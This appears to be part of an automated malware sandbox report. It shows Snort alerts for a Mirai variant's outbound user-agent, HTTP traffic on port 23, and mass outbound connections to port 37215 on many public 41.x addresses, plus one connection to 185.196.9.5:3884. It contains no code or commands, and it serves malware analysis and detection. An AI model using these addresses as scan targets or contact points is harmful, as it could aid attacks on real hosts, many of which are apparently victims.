Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50230 -> 95.110.222.87:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42928 -> 112.126.90.235:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39104 -> 112.197.41.86:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49816 -> 112.168.70.180:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39338 -> 112.160.97.21:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55148 -> 112.163.41.248:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35616 -> 112.166.148.193:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45194 -> 112.222.219.210:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:58634 -> 88.221.213.164:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45732 -> 112.31.148.231:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52932 -> 88.138.114.161:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55992 -> 88.198.101.19:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38660 -> 112.29.212.224:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52596 -> 88.119.169.103:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36248 -> 88.18.29.215:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42514 -> 88.221.28.225:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33250 -> 88.221.171.28:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38658 -> 112.29.212.224:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50456 -> 112.17.17.36:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50454 -> 112.17.17.36:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60552 -> 95.164.195.191:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:37150 -> 95.217.157.9:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42556 -> 95.173.181.239:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59322 -> 95.101.49.14:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40042 -> 88.31.76.241:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60592 -> 95.164.195.191:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40512 -> 95.52.78.184:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42138 -> 95.68.32.7:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48906 -> 95.86.127.86:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43694 -> 95.164.197.80:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45122 -> 95.163.199.7:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42614 -> 95.101.252.251:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50410 -> 95.216.195.75:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59818 -> 95.213.252.94:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48256 -> 95.183.36.188:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47120 -> 95.209.133.80:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49772 -> 112.213.98.172:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56212 -> 95.100.231.150:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35766 -> 112.48.180.191:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55998 -> 88.198.166.119:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56270 -> 95.100.231.150:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35820 -> 95.85.15.8:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35404 -> 95.211.52.84:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:39074 -> 95.111.255.30:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42028 -> 95.110.146.110:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51920 -> 95.101.20.68:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56296 -> 95.100.231.150:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44660 -> 112.175.173.75:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50362 -> 112.162.237.145:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50534 -> 112.165.99.56:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38074 -> 112.95.73.153:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43264 -> 95.101.237.182:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:36982 -> 95.144.131.146:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52108 -> 95.101.111.40:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35992 -> 95.213.226.7:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55942 -> 95.0.0.250:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60216 -> 95.111.201.226:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43302 -> 95.101.237.182:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49672 -> 112.199.233.119:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52586 -> 95.142.66.161:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:47038 -> 95.237.168.201:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45318 -> 95.217.7.225:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:46856 -> 95.86.108.194:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56404 -> 95.100.231.150:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55276 -> 95.79.106.197:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51070 -> 95.100.64.108:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55078 -> 112.184.176.83:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:34586 -> 88.84.135.3:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:52500 -> 88.99.85.206:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51440 -> 112.140.185.145:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33824 -> 95.85.216.8:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33990 -> 95.128.110.146:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:42260 -> 95.205.53.195:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45828 -> 88.184.23.134:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59290 -> 95.128.4.104:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55752 -> 88.221.46.16:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51244 -> 88.221.30.95:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:45292 -> 88.227.38.117:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56542 -> 88.85.252.35:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60852 -> 112.148.112.212:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56644 -> 95.100.231.150:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44744 -> 95.65.89.22:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59920 -> 88.221.61.35:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:50286 -> 88.99.251.122:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53198 -> 88.99.236.140:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:53098 -> 88.96.218.158:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:43508 -> 88.221.73.155:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59090 -> 112.4.214.254:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:37982 -> 88.64.137.209:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59064 -> 95.217.250.44:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49084 -> 95.251.254.209:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35496 -> 95.0.243.228:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59054 -> 95.101.232.57:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38396 -> 112.175.14.4:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:48814 -> 112.126.71.222:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59080 -> 95.101.232.57:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49268 -> 88.221.17.173:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:55306 -> 95.100.57.42:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:60470 -> 95.101.58.131:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:33262 -> 95.169.192.197:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56572 -> 95.53.246.135:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59344 -> 95.85.86.117:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49426 -> 95.35.31.183:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51366 -> 95.217.25.126:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40656 -> 95.216.62.203:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:59330 -> 112.65.65.138:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:44842 -> 112.80.145.157:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40540 -> 112.186.214.117:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:56412 -> 112.124.57.246:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:49938 -> 95.111.243.40:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:51168 -> 95.217.163.47:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35622 -> 95.216.155.17:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:41530 -> 95.173.162.44:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:38844 -> 95.35.28.9:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57720 -> 112.48.155.162:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:35918 -> 95.128.144.105:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40154 -> 95.168.253.81:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:57700 -> 112.48.155.162:80
Source: Traffic	Snort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.15:40584 -> 88.208.240.26:80

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60208
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60220
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60226
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60234
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60326
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60340
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60344
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60354
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60368
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60424

Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.151.178.59:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.73.11.59:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.90.226.91:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.230.169.184:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.149.74.217:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.224.0.52:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.227.123.149:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.133.237.12:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.140.119.98:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.138.80.229:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.246.176.102:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.226.153.49:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.223.6.72:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.169.110.237:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.211.127.39:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.163.193.83:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.25.206.60:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.231.161.48:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.179.201.6:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.16.47.53:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.214.222.6:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.138.122.31:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.118.19.37:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.231.2.0:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.127.57.32:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.84.102.64:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.59.23.171:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.142.81.224:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.234.54.222:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.175.158.245:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.162.79.31:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.213.105.138:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.118.41.250:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.37.153.115:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.230.250.207:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.145.17.215:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.5.40.186:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.141.5.7:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.149.191.34:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.148.208.5:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.88.70.177:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.206.151.105:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.8.79.133:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.143.209.21:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.39.38.136:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.15.12.242:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.43.94.135:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.25.105.184:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.153.185.8:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.131.79.245:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.43.93.232:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.238.39.93:37215
Source: global traffic	TCP traffic: 192.168.2.15:60408 -> 185.196.9.5:3884
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.3.40.139:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.44.232.95:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.42.226.27:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.171.189.95:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.217.142.148:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.159.237.173:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.111.250.233:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.116.162.208:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.200.55.119:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.171.184.240:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.89.204.190:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.106.23.3:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.175.93.252:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.30.132.175:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.183.155.59:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.85.31.136:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.232.114.84:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.21.19.191:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.67.213.55:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.173.102.156:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.215.57.199:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.115.44.18:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.85.31.195:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.227.104.163:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.37.195.222:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.27.58.76:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.114.79.31:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.232.108.75:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.255.8.253:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.150.194.189:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.71.50.2:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.129.46.30:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.162.78.84:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.87.111.218:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.8.183.38:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.113.172.212:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.89.196.110:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.44.5.0:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.215.53.122:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.133.182.179:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.251.208.190:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.31.225.132:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.198.20.144:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.13.220.178:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.195.79.43:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.0.100.118:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.37.74.191:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.74.160.123:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.235.132.11:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.107.207.110:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.113.19.199:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.143.107.237:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.176.34.87:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.162.38.110:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.67.125.30:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.240.245.196:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.71.212.55:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.60.52.40:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.42.105.88:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.104.132.208:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.52.178.169:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.164.145.211:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.171.29.156:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.193.84.127:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.231.222.214:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.143.39.166:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.58.66.152:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.92.177.230:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.220.153.222:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.56.144.127:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.215.137.51:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.255.73.147:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.17.240.225:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.246.127.70:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.231.3.81:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.243.117.199:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.92.254.64:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.12.241.85:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.151.139.33:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.150.147.221:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.214.213.150:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.201.211.222:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.77.159.149:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.250.164.15:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.140.239.161:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.92.128.122:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.197.137.132:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.178.236.172:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.82.144.105:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.82.219.51:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.154.94.39:37215
Source: global traffic	TCP traffic: 192.168.2.15:6246 -> 41.27.248.158:37215
